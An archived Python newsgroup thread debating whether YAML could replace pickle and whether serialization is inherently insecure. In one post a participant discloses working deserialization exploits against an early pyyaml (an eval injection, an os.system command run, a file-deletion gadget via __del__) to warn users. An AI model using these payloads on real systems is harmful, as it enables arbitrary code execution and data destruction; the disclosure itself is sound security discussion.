PyYaml?

C

Chris S.

Is there any benefit to Pickle over YAML? Given that Pickle is insecure,
wouldn't it make more sense to support a secure serialization format,
one that's even readable to boot, such as YAML? There's even a pure
Python implementation at www.pyyaml.org
 
A

Andrew Dalke

Chris said:
Is there any benefit to Pickle over YAML? Given that Pickle is insecure,
wouldn't it make more sense to support a secure serialization format,
one that's even readable to boot, such as YAML? There's even a pure
Python implementation at www.pyyaml.org

Looking at the PyYaml docs, under "limitations"


] PyYaml converts Python builtin types bidirectionally, and converts
] instances unidirectionally (although with directives eg from_yaml
] and to_yaml it can do this bidirectionally). When YAMLizing an
] instance, PyYaml serializes only its instance data (its '.dict'),
] with no meta-information about which class it came from.

Add support for restoring an arbitrary class and you end
up with exactly the same security problems pickle has.

Also, I'll guess that it doesn't handle Python's new __slots__
since it only mentions __dict__.


Andrew
(e-mail address removed)
 
J

Jeremy Bowers

Is there any benefit to Pickle over YAML? Given that Pickle is insecure,
wouldn't it make more sense to support a secure serialization format,
one that's even readable to boot, such as YAML?

Anything that can "pickle" will be insecure. It is the capabilities of
pickling, not the implementation, that is insecure.
 
C

Chris S.

Andrew said:
Looking at the PyYaml docs, under "limitations"


] PyYaml converts Python builtin types bidirectionally, and converts
] instances unidirectionally (although with directives eg from_yaml
] and to_yaml it can do this bidirectionally). When YAMLizing an
] instance, PyYaml serializes only its instance data (its '.dict'),
] with no meta-information about which class it came from.

Add support for restoring an arbitrary class and you end
up with exactly the same security problems pickle has.

I believe those docs are slightly out dated. PyYaml does have limited
support for class restoration (at least in my experience). Granted the
class definition must be loaded into the current frame, a similar
limitation of Pickle. However, Pickle's small programming language
allows for arbitrary file deletion. That would not be possible with Yaml.
Also, I'll guess that it doesn't handle Python's new __slots__
since it only mentions __dict__.

True. In fact, the current implementation doesn't yet fully handle
subclassing/inheritance. They've done a lot, but it's still a work in
progress.
 
C

Chris S.

Jeremy said:
Anything that can "pickle" will be insecure. It is the capabilities of
pickling, not the implementation, that is insecure.

I disagree. Pickle's mini programming language allows for arbitrary file
deletion. There's nothing in the concept of serialization that requires
this ability.
 
P

Paul Rubin

Chris S. said:
Is there any benefit to Pickle over YAML? Given that Pickle is
insecure, wouldn't it make more sense to support a secure
serialization format, one that's even readable to boot, such as YAML?
There's even a pure Python implementation at www.pyyaml.org

Bleccch!
 
A

Andrew Dalke

Chris said:
However, Pickle's small programming language
allows for arbitrary file deletion. That would not be possible with Yaml.

I just looked through pickle.py's list of opcodes. I don't
see any which mention file deletion.

There are ones that let you call an arbitrary callable
with arbitrary parameters, like 'os.unlink' with your filename
of choice. But even if you limited that to arbitrary constructors,
instead of all arbitrary callables, you can still delete files.
Consider tempfile._TemporaryFileWrapper. Except under MS Windows,
if you make one of these its __del__ deletes the named files.
You can pass any name you want as the filename, so it provides
a way to delete files via pickle.

If Yaml lets me create
tempfile._TemporaryFileWrapper(None, "/path/to/file")
then that file will (eventually) be deleted.

If Yaml doesn't let me create that file then either 1) it
isn't as powerful as pickle or 2) it uses some registery
of allowed object. If #2, I think pickle support that too.

True. In fact, the current implementation doesn't yet fully handle
subclassing/inheritance. They've done a lot, but it's still a work in
progress.

Then why would be it a viable replacement for pickle?

Andrew
(e-mail address removed)
 
J

Jeremy Bowers

I disagree. Pickle's mini programming language allows for arbitrary file
deletion. There's nothing in the concept of serialization that requires
this ability.

Point. But it is also insecure because instantiating objects can cause
arbitrary code to execute. This is fundamental to any Pickle in Python.
Given that, one might as well shoot for speed, ease of implementation, and
concise representations (power of implementation) without worrying about
security.

In other words, I expect that the ability to delete files is an effect
(second-order) of the fundamental insecurity, and not a cause, in the
sense that removing that particular issue does not get you significantly
closer to security.
 
W

Wilk

Chris S. said:
Is there any benefit to Pickle over YAML? Given that Pickle is
insecure, wouldn't it make more sense to support a secure
serialization format, one that's even readable to boot, such as YAML?
There's even a pure Python implementation at www.pyyaml.org

There is others advantages using yaml instead of pickle anyway
(portability, readability...)
Syck is even faster than pickle i think.
http://whytheluckystiff.net/syck/

But all theses projects seems to sleep...
 
C

Chris S.

Wilk said:
There is others advantages using yaml instead of pickle anyway
(portability, readability...)
Syck is even faster than pickle i think.
http://whytheluckystiff.net/syck/

I agree completely, although I've been surprised by the general lack of
interest around here. You'd think a more secure, portable, and readable
serialization format would be welcomed with open arms, yet most of the
comments I've read past and present have been almost hostile.
But all theses projects seems to sleep...

Can you blame them from the lack of interest? No good idea goes
unpunished... Ironically, YAML borrows key ideas from several languages,
including Python.
 
P

Paul Moore

Chris S. said:
I agree completely, although I've been surprised by the general lack of
interest around here. You'd think a more secure, portable, and readable
serialization format would be welcomed with open arms, yet most of the
comments I've read past and present have been almost hostile.

"Hostile" seems a little exaggerated. The original posting (quoted
above) asked the question "Is there any benefit to Pickle over YAML?"
I suppose that a reasonable answer (from me) might be "not that I
know of", but that begs the question, as I know very little of YAML.

Maybe the original poster (or some other supporter of YAML) could
provide some reasons to think that YAML *might* be superior to
Pickle. Then the people who know about Pickle could respond more
helpfully.

For example, you (Chris S) claim that YAML is "more secure, portable,
and readable". OK, let's take these in turn:

More secure - as others have pointed out, Pickle allows pickling and
unpickling of class instances, and class code can do what it likes in
the constructor (I oversimplify here, as I don't know the details well
myself). Sure, this is a security issue, but it's an inherent
insecurity in the feature, and not limited to Pickle. If YAML
implemented the same feature, it would have the same issues to
resolve. Improving security by removing features isn't a clear win for
YAML (note thet I am not saying that security in exchange for reduced
features might not be a good tradeoff in some cases - I'm addressing
the "replace Pickle with YAML" suggestion, not a suggestion that we
have both).

More portable - hmm, OK. I'm not sure where you want portability
*between*, though. Pickle is, as far as I know, portable across
platforms. Are you talking about portability between languages? I
can't think where I'd want to dump a Python object for loading into
Perl or Ruby, though. Can you offer me some real-life use cases?

More readable - I'll give you this. And yes, it can be useful. I've
been stuffed before now with Java programs whose configuration is
stored as a serialised-to-disk object which is completely opaque to
external tools, let alone human readers. But this is a property that
is useful only in case of failure (if the config gets stuffed, I can
hand-hack the dump file, or if I forget what I set parameter X to, I
can look in the dump). If the application design *requires* the dump
format to be readable, we've moved away from serialisation, and
started to talk about configuration formats (which is a separate
issue, one in which it is quite possible that YAML is strong, but
*not* one in which it is competing with Pickle).
Can you blame them from the lack of interest? No good idea goes
unpunished... Ironically, YAML borrows key ideas from several
languages, including Python.

I have certainly looked at YAML. I have to say that I wasn't really
sure what it *was* though. It seems to claim to be different things
at different times - a serialisation format, a config file format, a
replacement for XML, ... At the time, I was looking for a config
format, and it wasn't *quite* what I wanted, because some of the
serialisation and XML aspects made it slightly clumsy as a config
format. I suspect that people who want to use YAML for serialisation,
or as an XML replacement, may feel the same way. And yet, I don't get
the feeling that YAML is being developed as a "compromise" format, so
I am obviously missing a key design principle.

As regards the existing YAML libraries for Python, when I looked I
found that the PyYAML website claimed that it was out of date with
respect to the latest spec. I also tried SYCK, which looks OK, but
which I did manage to provoke a crash from without trying too hard.
Also, there were a number of features (not that I know how important
they are) marked with "Available in Ruby" (and hence not Python, I
assume, given that other features mention Python explicitly).

None of this is a criticism of YAML and/or its libraries themselves.
However, it does make any suggestion that YAML be used to replace a
key part of the Python standard library seem a little premature, at
least.

I hope this response didn't come across as hostile - I certainly
don't intend it that way. But I do believe that it is the
responsibility of those making the suggestion that YAML replace
pickle to come up with decent arguments. (Or a robust, tested,
documented patch for the Python core, of course - that avoids the
impression that the requester is hoping that someone else will do the
work for him :))

I'd like to see a strong (this includes "well-documented"!! :)) YAML
library for Python, if only so I could try it out and find out what
YAML *is* good for, in my environment. In theory, I like YAML - it's
just the practicalities that elude me.

[Later]
I just re-read some of the YAML website. It appears clear from there
that YAML is designed as a serialisation format. But there seems to
be a lack of justification as to *why* the design goals (section 1.1
of the spec) are important. Also, security is *not* an explicit goal,
and section 3.1.6 (the "Construct" process) is completely lacking in
any discussion of the security or other implications of converting a
YAML file to a native language object. This seems somewhat surprising
in a specification for a serialisation format...

Paul.
 
A

Andrew Dalke

Chris said:
I agree completely, although I've been surprised by the general lack of
interest around here. You'd think a more secure, portable, and readable
serialization format would be welcomed with open arms, yet most of the
comments I've read past and present have been almost hostile.

YAML and pickles address two different but related domains.
Pickle attempts to serialize and deserialize arbitrary
Python data structures. YAML serializes a subset of the
data structures that can be made portable, with it seems
some hooks for new datatypes.

Here's a test. Can you do the following in YAML and do
so securely? (Untested code.)

class DeleteFile:
def __init__(self, filename, yes_really = False):
self.filename = filename
self.yes_really = yes_really
def __eq__(self, other):
return (self.filename == other.filename and
self.yes_really == other.yes_really)
def __del__(self, remove = os.remove):
if self.yes_really:
try:
remove(self.filename)
except IOError:
pass

# this works for pickle. Does it work for YAML?
x = DeleteFile("/path/to/important/file")
... store 'x' to YAML file ...
y = ... read from YAML file
assert x == y

# This is insecure in pickle. Would YAML be secure?
z = ... read artibtrary YAML file which may have a
DeleteFile where 'yes_really' is True ...
del z

Or what about support for multiple inheritance?

import datetime

class Base1:
def __init__(self, a, b):
self.a = a
self.b = b
def speak(self):
print "The", self.a, "says", self.b

class Base2:
def __init__(self, x):
self.x = x
def spell(self):
print self.x, "is spelled", "-".join(list(self.x))

class Child(Base1, Base2):
def __init___(self, a, b):
Base1.__init__(self, a, b)
Base2.__init__(self, a)
self.z = datetime.datetime.now()


kid = Child("goat", "baaaaa")
... save 'kid' to YAML ...
animal = ... read that YAML file ...
animal.speak()
animal.spell()

In either case, how in the world is it portable?

Andrew
(e-mail address removed)
 
C

Chris S.

Paul said:
"Hostile" seems a little exaggerated. The original posting (quoted
above) asked the question "Is there any benefit to Pickle over YAML?"
I suppose that a reasonable answer (from me) might be "not that I
know of", but that begs the question, as I know very little of YAML.

Maybe the original poster (or some other supporter of YAML) could
provide some reasons to think that YAML *might* be superior to
Pickle. Then the people who know about Pickle could respond more
helpfully.

For example, you (Chris S) claim that YAML is "more secure, portable,
and readable". OK, let's take these in turn:

More secure - as others have pointed out, Pickle allows pickling and
unpickling of class instances, and class code can do what it likes in
the constructor (I oversimplify here, as I don't know the details well
myself). Sure, this is a security issue, but it's an inherent
insecurity in the feature, and not limited to Pickle. If YAML
implemented the same feature, it would have the same issues to
resolve. Improving security by removing features isn't a clear win for
YAML (note thet I am not saying that security in exchange for reduced
features might not be a good tradeoff in some cases - I'm addressing
the "replace Pickle with YAML" suggestion, not a suggestion that we
have both).

I don't quite follow your logic. If you load a serialized file, you
should conceivably already know what classes it should and should not be
instantiating, and be able to restrict its access accordingly. Of
course, a file could still be altered to wreak havoc within the confines
of the set limitations, but I'm under the impression that Pickle allows
execution of arbitrary code, regardless of the classes being
instantiated. Please correct me if I'm wrong.
More portable - hmm, OK. I'm not sure where you want portability
*between*, though. Pickle is, as far as I know, portable across
platforms. Are you talking about portability between languages? I
can't think where I'd want to dump a Python object for loading into
Perl or Ruby, though. Can you offer me some real-life use cases?

I meant language and platform portability. I suppose you'd find this
aspect attractive for the same reasons you'd use XML, which some have
also used as a serialization format. Granted, not every languages'
objects may be translatable, but many languages share common data
primitives.
More readable - I'll give you this. And yes, it can be useful. I've
been stuffed before now with Java programs whose configuration is
stored as a serialised-to-disk object which is completely opaque to
external tools, let alone human readers. But this is a property that
is useful only in case of failure (if the config gets stuffed, I can
hand-hack the dump file, or if I forget what I set parameter X to, I
can look in the dump). If the application design *requires* the dump
format to be readable, we've moved away from serialisation, and
started to talk about configuration formats (which is a separate
issue, one in which it is quite possible that YAML is strong, but
*not* one in which it is competing with Pickle).
[snip]

None of this is a criticism of YAML and/or its libraries themselves.
However, it does make any suggestion that YAML be used to replace a
key part of the Python standard library seem a little premature, at
least.
>
I hope this response didn't come across as hostile - I certainly
don't intend it that way. But I do believe that it is the
responsibility of those making the suggestion that YAML replace
pickle to come up with decent arguments. (Or a robust, tested,
documented patch for the Python core, of course - that avoids the
impression that the requester is hoping that someone else will do the
work for him :))

Fair enough. I didn't mean to imply that the current YAML
implementations were drop-in replacements for Pickle, only that the
concept of YAML deserves more attention.
I'd like to see a strong (this includes "well-documented"!! :)) YAML
library for Python, if only so I could try it out and find out what
YAML *is* good for, in my environment. In theory, I like YAML - it's
just the practicalities that elude me.

[Later]
I just re-read some of the YAML website. It appears clear from there
that YAML is designed as a serialisation format. But there seems to
be a lack of justification as to *why* the design goals (section 1.1
of the spec) are important. Also, security is *not* an explicit goal,
and section 3.1.6 (the "Construct" process) is completely lacking in
any discussion of the security or other implications of converting a
YAML file to a native language object. This seems somewhat surprising
in a specification for a serialisation format...

Well, if the concept of serialization is indeed inherently insecure,
what could they possibly do? In order for YAML to directly address
security, it would have to concern itself with the "meaning" of the data
being serialized, which seems outside the scope of YAML's purpose.
Serialization security seems generally assigned as a responsibility of
the user, who is usually in the best position to gage their data's
effects. The best a serialization format can do is ensure data
reconstruction within the bounds described by the user.
 
C

Chris S.

Andrew said:
YAML and pickles address two different but related domains.
Pickle attempts to serialize and deserialize arbitrary
Python data structures. YAML serializes a subset of the
data structures that can be made portable, with it seems
some hooks for new datatypes.

Here's a test. Can you do the following in YAML and do
so securely? (Untested code.)

[snip code]

Conceptually, yes. That code would work fine with a full YAML
implementation. Admittedly, the current pure-Python implementation is
not yet complete. I didn't mean to imply that the current YAML
implementations were drop-in replacements for Pickle, only that the
concept of YAML is deserving of more attention.
 
J

Jeremy Bowers

I don't quite follow your logic. If you load a serialized file, you should
conceivably already know what classes it should and should not be
instantiating, and be able to restrict its access accordingly.

In theory, yes. In Java, yes, I would imagine. In Python, not so far. In
fact, note that Bastion and RExec have been removed from modern Pythons
because they were false assurances. Securing Pickle is probably the same
problem as re-writing those modules to work in modern Python. People more
familiar with the internals can give more details about that, though I'd
google the Python dev list before asking anyone.

It is probably not theoretically impossible to add this to Python but it
is surprisingly difficult; it is the sort of thing you have to design into
the language from day one and even then it is hard.
I meant language and platform portability. I suppose you'd find this
aspect attractive for the same reasons you'd use XML, which some have also
used as a serialization format. Granted, not every languages' objects may
be translatable, but many languages share common data primitives.

You'd be surprised, if you actually tried. (This is technically off-topic,
not directly about Pickle.)

A data type is basically a range of values, and a set of operations on it
that returns some value.

So, C has this thing called an "int", right? Surely Python has it too.

But, technically, it doesn't. Compare (this is "test.cpp"):

#include <iostream>

int main() {
int a = 1073741824;
std::cout << a * 4 << std::endl;
return 0;
}
4294967296



Python and C do *not* have the same int "datatype". This matters when you
go to serialize 2 ^ 43 and the resulting number works in Python but has
some random looking value in C++.

If you really get down to it, languages share far fewer datatypes than
you'd think, and while the ten-mile-high view says "Oh, that shouldn't
matter", I assure you, if you actually got into trying to design an actual
serialization protocol you'd rapidly find it matters.
 
A

Andrew Dalke

[Long post. Summary is I've found three exploits in
pyyaml and at least five limitations w.r.t. the existing
Python pickles. I DO NOT recommend anyone use pyyaml
when the input comes from untrusted code.

REPEAT: pyyaml allows ARBITRARY CODE TO BE EXECUTED.]

Me:
Conceptually, yes. That code would work fine with a full YAML
implementation. Admittedly, the current pure-Python implementation is
not yet complete. I didn't mean to imply that the current YAML
implementations were drop-in replacements for Pickle, only that the
concept of YAML is deserving of more attention.

This original thread started with you asking:
> Is there any benefit to Pickle over YAML?

You have since distinguished between two YAMLs, the conceptual
one and the concrete one.

If it's the latter then the answer we've made several times
is that YAML as currently implemented is not able to replace
pickle. You here agree with us.

Let's suppose YAML-the-concept was implemented. That's
going to call for a lot of work so that the implementation
meets the concept, and well beyond what's been done so far.

For example, to be a viable pickle replacement will require
a C implementation because the performance is important.
The pure Python version "pickle.py" wasn't fast enough so
Someone (Jim Fulton, as I recall) contributed cPickle.

You'll also need a non-recursive implementation. Here's
a test with the pyyaml version I just got from svn using
a very deep data structure. It hits Python's recursion
limit:
.... x = (x,)
....Traceback (most recent call last):
File "<stdin>", line 1, in ?
File "yaml/dump.py", line 18, in dump
return Dumper().dump(*data)
File "yaml/dump.py", line 43, in dump
self.dumpDocuments(data)
File "yaml/dump.py", line 61, in dumpDocuments
self.dumpData(obj)
File "yaml/dump.py", line 90, in dumpData
.....
self.dumpList(data)
File "yaml/dump.py", line 138, in dumpList
self.indentDump(item)
File "yaml/dump.py", line 67, in indentDump
self.dumpData(data)
RuntimeError: maximum recursion depth exceeded
It doesn't handle tuples, only lists
>>> print yaml.load(yaml.dump( (1,2,3) )).next() [1, 2, 3]
>>>


I see it doesn't handle Unicode correctly. Here
it doesn't round-trip a Unicode character back to
Unicode.

Digging deeper into the YAML implementation I see
it really doesn't handle Unicode correctly -- there's
even a *MAJOR* security hole. Watch this. I'll
start with a hand-crafted YAML file and read it.

% cat test.yaml
--- "\u000a"+' '.join(__import__('os').listdir('.')) + ""
% python
Python 2.4a2 (#1, Aug 29 2004, 22:30:12)
[GCC 3.3 20030304 (Apple Computer, Inc. build 1495)] on darwin
Type "help", "copyright", "credits" or "license" for more information.u'\n.svn assets docs examples experimental patches README scripts
setup.py test.yaml TESTING yaml'
See how it eval'ed the embedded and artibrary
Python code in the string it thought was Unicode?
That's because the code in implicit.py doesn't fully
verify the string before eval'ing it, in

if val[0] == '"' and val[-1] == '"':
if re.search(r"\u", val):
val = "u" + val
unescapedStr = eval (val)


This code is also suspect, from klass.py

def makeClass(module, classname, dict):
exec('import %s' % (module))
klass = eval('%s.%s' % (module, classname))
obj = new.instance(klass)
if hasMethod(obj, 'from_yaml'):
return obj.from_yaml(dict)
obj.__dict__ = dict
return obj


Yep, here's an exploit against it. The chr(32) is needed because
there's some sort of split on space upstream so I can't embed
spaces directly. But I can construct them so this shows that
I can pass arbitrary commands to the shell. (Note: the s= ...
assignment is all on one line.)
total 326905
drwxrwxr-x 51 root admin 1734 12 Sep 19:16 Applications
drwxrwxr-x 21 root admin 714 21 Jun 2003 Applications (Mac OS 9)
lrwxr-xr-x 1 root admin 15 17 Feb 2003 Desktop (Mac OS 9)
rebuild
... many lines delete ...
drwxr-xr-x 12 root wheel 408 12 Sep 2003 usr
lrwxr-xr-x 1 root admin 11 14 Feb 2004 var -> private/var
Traceback (most recent call last):
File "<stdin>", line 1, in ?
File "yaml/load.py", line 83, in next
return self.parse_value(indicator)
File "yaml/load.py", line 168, in parse_value
value = self.parse_unaliased_value(value)
File "yaml/load.py", line 179, in parse_unaliased_value
return self.typeResolver.resolveType(value, url)
File "yaml/klass.py", line 12, in resolveType
return makeClass(moduleName, className, data)
File "yaml/klass.py", line 16, in makeClass
klass = eval('%s.%s' % (module, classname))
File "<string>", line 1
os;os.system("ls"+chr(32)+"-l"+chr(32)+"/");1.2
^
SyntaxError: invalid syntax
Note that I was able to generate the os.system call
before the SyntaxError.

Here's another exploit. It's a variation of the "delete
an arbitrary file" example I posted that you replied could
be made secure "conceptually". It works because the
platform._popen class deletes the temporary file on __del__.

[Andrew-Dalkes-Computer:~/cvses/pyyaml/trunk] dalke% cat rmfile.yaml
--- !!platform._popen
bufsize: ~
mode: r
pipe: ~
tmpfile: delete_this_file.txt

% ls -l delete_this_file.txt
-rw-r--r-- 1 dalke staff 28 19 Sep 23:00 delete_this_file.txt
% python
Python 2.4a2 (#1, Aug 29 2004, 22:30:12)
[GCC 3.3 20030304 (Apple Computer, Inc. build 1495)] on darwin
Type "help", "copyright", "credits" or "license" for more information.% ls -l delete_this_file.txt
ls: delete_this_file.txt: No such file or directory
%



Oh, and I already mentioned that you need support
for __slots__. It also looks like pyyaml doesn't support
classes derived from builtins, as in
.... def blah(self): print "blah blah"
....
>>> x=MyList([1,3,5])
>>> x [1, 3, 5]
>>> x.blah() blah blah
>>> print yaml.dump(x) --- [1, 3, 5]
>>> yaml.load(yaml.dump(x)).next() [1, 3, 5]
>>> yaml.load(yaml.dump(x)).next().blah()
Traceback (most recent call last):

Because YAML the implementation is so far from YAML
the concept, and YAML the implementation is at least
as insecure as pickle, why should we look at YAML
any further?

In fact, I wouldn't even use pyyaml now for any of
my projects knowing just how insecure it is.

> Given that Pickle is insecure, wouldn't it make
> more sense to support a secure serialization format,
> one that's even readable to boot, such as YAML?

Again, please tell me how you can have a "secure
serialization format" which prevents my "__del__
calls os.unlink on arbitrary filename" attack. You've
said it's possible in the abstract. The only way
I know is to register the classes that are safe
to deserialize. But pickles already allow that.

So how would YAML-the-conceptual be any more
secure than pickles as they've existed for years?

And how long would it be until YAML-the-implementation
hopes to be comparable to pickles for both speed
and security?

For that matter, why doesn't pyyaml use the existing
protocol in Python to ask an instance for how to
serialize itself? Why does it need to define a new one?

Finally, you said
> the concept of YAML is deserving of more attention.

What is the concept? Why is it more deserving
than, say, XML-RPC encoding, or SOAP's, or CORBA's
serialization, or David Mertz' xml_pickle, or
Twisted's jelly, or any of a dozen other
serializations?

- it's not as fast, nor as small as a binary pickle
done with cPickle
- it doesn't understand tuples vs. lists
- it doesn't have the buzz of XML (and XML
advocates also claim readability)
- it doesn't have jelly's upversioning support (when
I looked at it, Twisted allowed classes to
describe how to upgrade older pickles to conform
with changes in the class)
- it doesn't have the validation tools that CORBA
has to ensure that received data fields are at
least the correct types

Some are limitations of the implementation, but the
bar is pretty high so it's up to the advocates (and
of the years YAML's been about you're the first I've
seen) to prove it's deserving.

Andrew
(e-mail address removed)
 
C

Clark C. Evans

Andrew,

Thank you for taking some serious time looking at PyYaml, I'm not
surprised you have found problems; the entire code base was written
in a very short amount of time and numerous short-cuts were taken.
Tim Parkin has decided on a complete rewrite of PyYaml and that's
great news. For now, you may want to consider using syck, but even
then, you can probably find exploits if you dig hard enough. Patches
are, of course, warmly received.

Primary comments on this thread:

- YAML was intended from the first day to be a cross-language
serialization tool. In a mixed-language environment (we use
Ruby, Python and on occasion Perl) YAML is a very nice to use.

- Unlike XML, YAML has a information model which closely matches
the needs of programming languages. I can't express how
important this is. We have spent a great deal of time on the
model, YAML simply isn't a data format. We are working on
transformation languages, and other generic tools.

- YAML was created for human reading / authoring. We have spent
an enormous amount of time working with real use cases of data
to find a very clean expression of structured data. If you
like Python's use of whitespace to show structure, you will
probably like YAML. While automated generation of YAML isn't
that pretty, it eventually will be.

- This is a long term project; YAML is designed with the idea that
data lives far longer than programs. We are taking our time. We
have also strived for 'consensus' when possible, this may seem
to slow down specification and implementation work, however, we
are better for it. There are lots of people who have provided
critical insights for YAML and it's been a delightful community.

- Implementing YAML isn't easy. At every step of the way the
consensus has been to keep a clean information model and have
lots of human presentation options. The only time we favored an
implementation issue over presentation is when it would prevent
YAML from being used in a streaming application. Therefore we
have stuck with very minimal look-ahead requirements. That
said, if you are looking for a LR(1) grammar for ANTLR or Bison,
I don't think one exists; but, alas I'll be gladly proven wrong.

- YAML isn't an efficient binary format. Pickle or something like
Jelly's s-expressions will be far faster to parse and load.

- Finally, everyone working on YAML has full time job; we do not
have grant funding or university backing. Therefore, implementations
will take time to mature; especially considering the complexity
of the tradeoffs.

I hope this is helpful to you.

Clark
 
C

Clark C. Evans

On Sun, Sep 19, 2004 at 02:53:22PM +0100, Paul Moore wrote:
| It seems to claim to be different things at different times - a
| serialization format, a config file format, a replacement for XML

At conception, I wanted a text format for invoices and other
transactional business documents that was: (a) very human readable,
(b) loaded into native data structures without requiring a DOM or a
bunch of parser-hand-holding, (c) had a simple enough information
model that a schema and transformation language would not be a
serious exercise in topology. Brian Ingerson, one of the other
co-authors was working on something similar to Pickle for Perl.

| At the time, I was looking for a config format, and it wasn't
| *quite* what I wanted, because some of the serialization and XML
| aspects made it slightly clumsy as a config format.

That some people use it for configuration files is due to Brian's
influence on the more-than-one-way-to-write-it. Also, our earlier
goals of a cross-language serialization tool got in the way of
making it a great configuration file language. We've since had to
make some compromises in this regard. Two other good uses for YAML
include log files and tests suites. Neither of which were the
initial focus, but alas, some things get a life of their own.

| I suspect that people who want to use YAML for serialization,
| or as an XML replacement, may feel the same way. And yet, I don't get
| the feeling that YAML is being developed as a "compromise" format, so
| I am obviously missing a key design principle.

I work with business documents all the time; especially ones that
move between computer systems using different programming languages.
So, this was my primary goal; we advertise YAML as a serialization
language since this is the 'easiest category' to put ourselves in.

| As regards the existing YAML libraries for Python, when I looked I
| found that the PyYAML website claimed that it was out of date with
| respect to the latest spec. I also tried SYCK, which looks OK, but
| which I did manage to provoke a crash from without trying too hard.

Er ya. Don't do "syck.parse", I need to remove that function from
the public interface. The newest release of Syck is far more stable
so you may want to try it again.

| None of this is a criticism of YAML and/or its libraries themselves.
| However, it does make any suggestion that YAML be used to replace a
| key part of the Python standard library seem a little premature, at
| least.

Definitely. YAML has at least two more years of work before it'd be
ready for even proposing that it be considered as a core library.

| I just re-read some of the YAML website. It appears clear from there
| that YAML is designed as a serialization format. But there seems to
| be a lack of justification as to *why* the design goals (section 1.1
| of the spec) are important. Also, security is *not* an explicit goal,
| and section 3.1.6 (the "Construct" process) is completely lacking in
| any discussion of the security or other implications of converting a
| YAML file to a native language object. This seems somewhat surprising
| in a specification for a serialization format...

*nods* I hope the discussion above helps. I doubt that YAML would
ever be a good 'drop-in' replacement for pickle. If in the far-distant
future someone were to propose using YAML in this way, it'd probably be
one of N 'formats' for a more pluggable pickle module.

| More portable - hmm, OK. I'm not sure where you want portability
| *between*, though. Pickle is, as far as I know, portable across
| platforms. Are you talking about portability between languages? I
| can't think where I'd want to dump a Python object for loading into
| Perl or Ruby, though. Can you offer me some real-life use cases?

Certainly. I work with several programmers in different shops,
we move transactional documents around, traditionally with XML,
but more so with YAML. By next year this time I hope it is all
YAML. If you are just using hash/list/scalar data types (90%
of our use cases) then YAML is a great option. In fact, recently
we had a customer start using the Perl version of YAML with our
system and it worked.

| More readable - I'll give you this. And yes, it can be useful. I've
| been stuffed before now with Java programs whose configuration is
| stored as a serialized-to-disk object which is completely opaque to
| external tools, let alone human readers. But this is a property that
| is useful only in case of failure (if the config gets stuffed, I can
| hand-hack the dump file, or if I forget what I set parameter X to, I
| can look in the dump). If the application design *requires* the dump
| format to be readable, we've moved away from serialization, and
| started to talk about configuration formats (which is a separate
| issue, one in which it is quite possible that YAML is strong, but
| *not* one in which it is competing with Pickle).

Exactly. The older PyYaml made configuration files painful, as it
was trying to implicitly type all kinda of data (recognizing floating
points, dates, etc.). We found this behavior to be a bit
counter-productive for config files, and hence this "implicit
typing" is now strictly optional, application directed behavior.

Best,

Clark
 
P

Paul Moore

[large snip of points already covered far better than I could by
Andrew Dalke...]
Fair enough. I didn't mean to imply that the current YAML
implementations were drop-in replacements for Pickle, only that the
concept of YAML deserves more attention.

I'd say that the "concept" of YAML (in isolation) isn't particularly
clear. I certainly can't discern from the documentation on the
website what it is.
Well, if the concept of serialization is indeed inherently insecure,
what could they possibly do?

I dunno. First, is serialisation inherently insecure? If YAML is all
about serialisation, then one of the key points in its documentation
should be either (a) "YAML focuses on providing a secure
serialisation format" or (b) "serialisation is inherently insecure,
for the following reasons - X, Y, Z - and so YAML cannot provide
secure serialisation. These are issues you have to consider when
using YAML..."
In order for YAML to directly address security, it would have to
concern itself with the "meaning" of the data being serialized,
which seems outside the scope of YAML's purpose.

How do you work that out? I can't find a concrete enough statement of
YAML's purpose to allow me to make a categorical statement like that.
Serialization security seems generally assigned as a responsibility
of the user, who is usually in the best position to gage their
data's effects. The best a serialization format can do is ensure
data reconstruction within the bounds described by the user.

As I say, most of this should be in the YAML documentation. I'll be
charitable and assume that it's just something that hasn't been
written up yet, but that section in the spec that I quoted looks
pretty explicit in its vagueness :)

Paul
 

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.

Ask a Question

Members online

Forum statistics

Threads
473,755
Messages
2,569,534
Members
45,008
Latest member
Rahul737

Latest Threads

Top